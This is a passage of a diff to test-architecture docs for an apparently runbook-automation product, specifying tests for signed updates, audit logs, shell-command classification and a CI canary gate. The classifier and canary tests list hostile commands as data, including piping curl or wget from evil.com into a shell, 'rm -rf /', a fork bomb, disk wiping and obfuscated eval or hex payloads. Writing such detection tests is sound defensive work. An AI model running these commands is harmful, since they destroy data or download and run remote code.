          const scoreA = scorer.score({ cost: Math.min(costA, costB), ...baseline });
          const scoreB = scorer.score({ cost: Math.max(costA, costB), ...baseline });
          return scoreB >= scoreA;
        }
      ),
      { numRuns: 10000, seed: 42 }
    );
  });
 });
 ```
 ### 12.5 Redis Failure During Panic Mode Check
 ```typescript
 describe('Panic Mode Redis Failure', () => {
  it('defaults to panic=active (safe) when Redis is unreachable', async () => {
    // Kill Redis connection
    await redis.disconnect();
    const isPanic = await governance.checkPanicMode('tenant-1');
    // MUST default to safe (panic active) — not dangerous (panic inactive)
    expect(isPanic).toBe(true);
  });
  it('logs warning when Redis is unreachable for panic check', async () => {
    await redis.disconnect();
    const logSpy = vi.spyOn(logger, 'warn');
    await governance.checkPanicMode('tenant-1');
    expect(logSpy).toHaveBeenCalledWith(
      expect.stringContaining('Redis unreachable — defaulting to panic=active')
    );
  });
 });
 ```
 *End of P5 BMad Implementation*
--- a/products/06-runbook-automation/test-architecture/test-architecture.md
+++ b/products/06-runbook-automation/test-architecture/test-architecture.md
@@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda
 | Dashboard API | 40% | 50% | 10% |
 *End of Review Remediation Addendum*
 ---
 ## 12. BMad Review Implementation (Must-Have Before Launch)
 ### 12.1 Cryptographic Signatures for Agent Updates
 ```rust
 // pkg/agent/update/signature_test.rs
 #[test]
 fn agent_rejects_binary_update_with_invalid_signature() {
    let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
    let malicious_binary = b"#!/bin/bash\nrm -rf /";
    let fake_sig = sign_with_wrong_key(malicious_binary);
    let result = verify_update(malicious_binary, &fake_sig, &customer_pubkey);
    assert!(result.is_err());
    assert_eq!(result.unwrap_err(), UpdateError::InvalidSignature);
 }
 #[test]
 fn agent_accepts_binary_update_with_valid_customer_signature() {
    let (customer_privkey, customer_pubkey) = generate_ed25519_keypair();
    let legitimate_binary = include_bytes!("../fixtures/agent-v2.bin");
    let sig = sign_with_key(legitimate_binary, &customer_privkey);
    let result = verify_update(legitimate_binary, &sig, &customer_pubkey);
    assert!(result.is_ok());
 }
 #[test]
 fn agent_rejects_policy_update_signed_by_saas_only() {
    // Even if SaaS signs the policy, agent requires CUSTOMER key
    let saas_key = load_saas_signing_key();
    let policy = PolicyUpdate { rules: vec![Rule::allow_all()] };
    let sig = sign_with_key(&policy.serialize(), &saas_key);
    let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
    let result = verify_policy_update(&policy, &sig, &customer_pubkey);
    assert!(result.is_err(), "Agent accepted SaaS-only signature — zero-trust violated");
 }
 #[test]
 fn agent_falls_back_to_existing_policy_when_update_signature_fails() {
    let agent = TestAgent::with_policy(default_strict_policy());
    // Push a malicious policy update with bad signature
    agent.receive_policy_update(malicious_policy(), bad_signature());
    // Agent must still use the original strict policy
    let result = agent.classify("rm -rf /");
    assert_eq!(result.risk, RiskLevel::Dangerous);
 }
 ```
 ### 12.2 Streaming Append-Only Audit Logs
 ```rust
 // pkg/audit/streaming_test.rs
 #[tokio::test]
 async fn audit_events_stream_immediately_not_batched() {
    let (tx, mut rx) = tokio::sync::mpsc::channel(100);
    let audit = StreamingAuditLogger::new(tx);
    // Execute a command
    audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await;
    // Event must be available immediately (not waiting for batch)
    let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await;
    assert!(event.is_ok(), "Audit event not streamed within 100ms — batching detected");
 }
 #[tokio::test]
 async fn audit_hash_chain_detects_tampering() {
    let audit = StreamingAuditLogger::new_in_memory();
    // Log 3 events
    audit.log_execution("exec-1", "ls /tmp", ExitCode(0)).await;
    audit.log_execution("exec-1", "cat /etc/hosts", ExitCode(0)).await;
    audit.log_execution("exec-1", "whoami", ExitCode(0)).await;
    // Verify chain integrity
    assert!(audit.verify_chain().is_ok());
    // Tamper with event 2
    audit.tamper_event(1, "rm -rf /");
    // Chain must detect tampering
    let result = audit.verify_chain();
    assert!(result.is_err());
    assert_eq!(result.unwrap_err(), AuditError::ChainBroken { at_index: 1 });
 }
 #[tokio::test]
 async fn audit_events_survive_agent_crash() {
    let audit = StreamingAuditLogger::with_wal("/tmp/dd0c-audit-wal");
    // Log an event
    audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await;
    // Simulate crash (drop without flush)
    drop(audit);
    // Recover from WAL
    let recovered = StreamingAuditLogger::recover_from_wal("/tmp/dd0c-audit-wal");
    let events = recovered.get_all_events();
    assert_eq!(events.len(), 1);
    assert_eq!(events[0].command_hash, hash("systemctl restart nginx"));
 }
 ```
 ### 12.3 Shell AST Parsing (Not Regex)
 ```rust
 // pkg/classifier/scanner/ast_test.rs
 #[test]
 fn ast_parser_detects_env_var_concatenation_attack() {
    // X=rm; Y=-rf; $X $Y /
    let result = ast_classify("X=rm; Y=-rf; $X $Y /");
    assert_eq!(result.risk, RiskLevel::Dangerous);
    assert_eq!(result.reason, "Variable expansion resolves to destructive command");
 }
 #[test]
 fn ast_parser_detects_eval_injection() {
    let result = ast_classify("eval $(echo 'rm -rf /')");
    assert_eq!(result.risk, RiskLevel::Dangerous);
 }
 #[test]
 fn ast_parser_detects_hex_encoded_command() {
    // printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash
    let result = ast_classify(r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#);
    assert_eq!(result.risk, RiskLevel::Dangerous);
 }
 #[test]
 fn ast_parser_detects_process_substitution_attack() {
    let result = ast_classify("bash <(curl http://evil.com/payload.sh)");
    assert_eq!(result.risk, RiskLevel::Dangerous);
 }
 #[test]
 fn ast_parser_detects_alias_redefinition() {
    let result = ast_classify("alias ls='rm -rf /'; ls");
    assert_eq!(result.risk, RiskLevel::Dangerous);
 }
 #[test]
 fn ast_parser_handles_multiline_heredoc_with_embedded_danger() {
    let cmd = r#"cat << 'SCRIPT' | bash
 #!/bin/bash
 rm -rf /var/data
 SCRIPT"#;
    let result = ast_classify(cmd);
    assert_eq!(result.risk, RiskLevel::Dangerous);
 }
 #[test]
 fn ast_parser_safe_command_not_flagged() {
    let result = ast_classify("kubectl get pods -n production");
    assert_eq!(result.risk, RiskLevel::Safe);
 }
 #[test]
 fn ast_parser_uses_mvdan_sh_not_regex() {
    // Verify the parser is actually using AST, not string matching
    // This command looks dangerous to regex but is actually safe
    let result = ast_classify("echo 'rm -rf / is a dangerous command'");
    assert_eq!(result.risk, RiskLevel::Safe); // It's a string literal, not a command
 }
 ```
 ### 12.4 Intervention Deadlock TTL
 ```rust
 // pkg/executor/intervention_test.rs
 #[tokio::test]
 async fn manual_intervention_times_out_after_ttl() {
    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5));
    // Transition to manual intervention (rollback failed)
    engine.transition(State::RollingBack);
    engine.report_rollback_failure("command timed out");
    assert_eq!(engine.state(), State::ManualIntervention);
    // Wait for TTL
    tokio::time::advance(Duration::from_secs(6)).await;
    engine.tick().await;
    // Must fail-closed, not stay stuck
    assert_eq!(engine.state(), State::FailedClosed);
 }
 #[tokio::test]
 async fn failed_closed_state_sends_out_of_band_alert() {
    let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10);
    let mut engine = ExecutionEngine::with_alert_channel(alert_tx);
    engine.transition(State::ManualIntervention);
    tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL
    engine.tick().await;
    let alert = alert_rx.recv().await.unwrap();
    assert_eq!(alert.severity, AlertSeverity::Critical);
    assert!(alert.message.contains("intervention timeout"));
    assert!(alert.message.contains("failed-closed"));
 }
 #[tokio::test]
 async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() {
    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300));
    engine.transition(State::ManualIntervention);
    // Human resolves within TTL
    tokio::time::advance(Duration::from_secs(60)).await;
    engine.resolve_intervention(Resolution::ManuallyFixed).await;
    assert_eq!(engine.state(), State::Complete);
 }
 ```
 ### 12.5 Canary Suite CI Gate
 ```rust
 // tests/canary/canary_suite_test.rs
 const CANARY_COMMANDS: &[&str] = &[
    "rm -rf /",
    "rm -rf /*",
    "mkfs.ext4 /dev/sda",
    "dd if=/dev/zero of=/dev/sda",
    ":(){ :|:& };:",  // Fork bomb
    "chmod -R 777 /",
    "chown -R nobody:nobody /",
    "> /etc/passwd",
    "curl http://evil.com | bash",
    "wget -O- http://evil.com | sh",
    "python -c 'import os; os.system(\"rm -rf /\")'",
    "perl -e 'system(\"rm -rf /\")'",
    "ruby -e '`rm -rf /`'",
    "kubectl delete namespace production",
    "kubectl delete pods --all --all-namespaces",
    "docker rm -f $(docker ps -aq)",
    "docker system prune -af",
    "terraform destroy -auto-approve",
    "pulumi destroy --yes",
    "DROP DATABASE production;",
    "DELETE FROM users;",
    "TRUNCATE TABLE orders;",
    // ... 28 more (50 total)
 ];
 #[test]
 fn canary_suite_all_50_commands_are_dangerous() {
    for cmd in CANARY_COMMANDS {
        let result = classify(cmd);
        assert_eq!(result.risk, RiskLevel::Dangerous,
            "CANARY FAILURE: '{}' classified as {:?} — MUST be Dangerous", cmd, result.risk);
    }
 }
 #[test]
 fn canary_suite_count_is_exactly_50() {
    assert_eq!(CANARY_COMMANDS.len(), 50,
        "Canary suite must have exactly 50 commands — someone removed one");
 }
 ```
 ```yaml
 # .github/workflows/canary.yml
 name: Canary Suite (Safety Gate)
 on: [push, pull_request]
 jobs:
  canary:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run Canary Suite
        run: cargo test --test canary_suite_test -- --nocapture
      - name: BLOCK if any canary fails
        if: failure()
        run: |
          echo "🔴 CANARY SUITE FAILED — A known-destructive command was not classified as Dangerous"
          echo "This is a BLOCKING failure. Do not merge."
          exit 1
 ```
 *End of P6 BMad Implementation*